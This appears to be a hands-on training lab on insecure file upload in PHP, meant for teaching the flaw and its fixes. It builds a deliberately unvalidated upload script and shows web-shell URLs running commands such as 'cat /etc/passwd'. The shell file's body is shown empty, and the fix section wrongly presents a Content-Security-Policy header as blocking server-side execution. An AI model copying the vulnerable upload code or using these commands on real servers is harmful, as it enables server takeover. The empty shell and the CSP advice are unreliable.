Exercise 49: Insecure File Upload (Remote Code Execution)

Objective

Learn how to exploit Insecure File Upload vulnerabilities by uploading malicious files (e.g., PHP web shells) to execute arbitrary commands on the server. Understand how to prevent this vulnerability using secure file upload practices.

---

Scenario

You are testing a web application with a file upload feature that does not properly validate uploaded files. An attacker can upload a malicious file, such as a PHP web shell, and execute arbitrary commands on the server.

---

Lab Setup

Prerequisites:

• Basic knowledge of PHP and server security.
• XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
• Tools like Burp Suite or browser developer tools for testing.

Step 1: Create the Vulnerable Web Application

1. PHP Script for Insecure File Upload
   • Create a file upload.php: <?php if (isset($_POST['upload'])) { $target_dir = "uploads/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "The file " . basename($_FILES["fileToUpload"]["name"]) . " has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } ?> <h2>Upload a File</h2> <form method="POST" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <button type="submit" name="upload">Upload File</button> </form>
2. Create the Uploads Directory
   • Create a directory named uploads in the web server’s root (htdocs for XAMPP).
   • Ensure it is writable by the server.
3. Running the Application
   • Start the Apache server.
   • Place upload.php in the web server’s root directory (htdocs for XAMPP).
   • Open http://localhost/upload.php in your browser.

---

Exploitation Steps

Step 1: Uploading a Malicious PHP Web Shell

1. Create a simple PHP web shell shell.php: <?php ?>
2. Upload shell.php using the upload form.
3. Access the shell in the browser: http://localhost/uploads/shell.php?cmd=ls

Expected Result:

• The server executes the ls command, listing the directory contents.

Step 2: Remote Command Execution

1. Execute other commands: http://localhost/uploads/shell.php?cmd=cat /etc/passwd

Expected Result:

• The server displays the contents of /etc/passwd.

---

Solution and Prevention

Problem Analysis

• The application allows file uploads without validating file types or extensions, enabling code execution.

Fixing the Vulnerability

1. Restrict Allowed File Types
   • Allow only safe file types (e.g., images): $allowed_types = ['image/jpeg', 'image/png', 'image/gif']; $file_type = mime_content_type($_FILES['fileToUpload']['tmp_name']); if (!in_array($file_type, $allowed_types)) { die("Invalid file type."); }
2. Rename Uploaded Files
   • Generate random filenames for uploaded files: $new_name = uniqid() . ".jpg"; move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], "uploads/" . $new_name);
3. Store Files Outside Web Root
   • Move uploaded files to a directory not accessible from the web: $target_dir = "/var/www/uploads/";
4. Disable Script Execution in Uploads Directory
   • Use .htaccess to block script execution: <FilesMatch "\.(php|php5|php7|phtml)$"> Deny from all </FilesMatch>
5. Use Content Security Policy (CSP)
   • Prevent execution of unauthorized scripts: header("Content-Security-Policy: default-src 'self'; script-src 'none'");

---

Testing After Fix

1. Attempt to upload shell.php.
2. Expected Result:
   • The server rejects the file or stores it in a non-executable directory.
3. Attempt to access the uploaded file.
4. Expected Result:
   • The server blocks the request or returns an error.

---

Conclusion

In this lab, you exploited an Insecure File Upload vulnerability to upload a malicious PHP web shell and execute commands on the server. You also learned how to prevent this vulnerability through file type validation, secure storage practices, and disabling script execution in upload directories.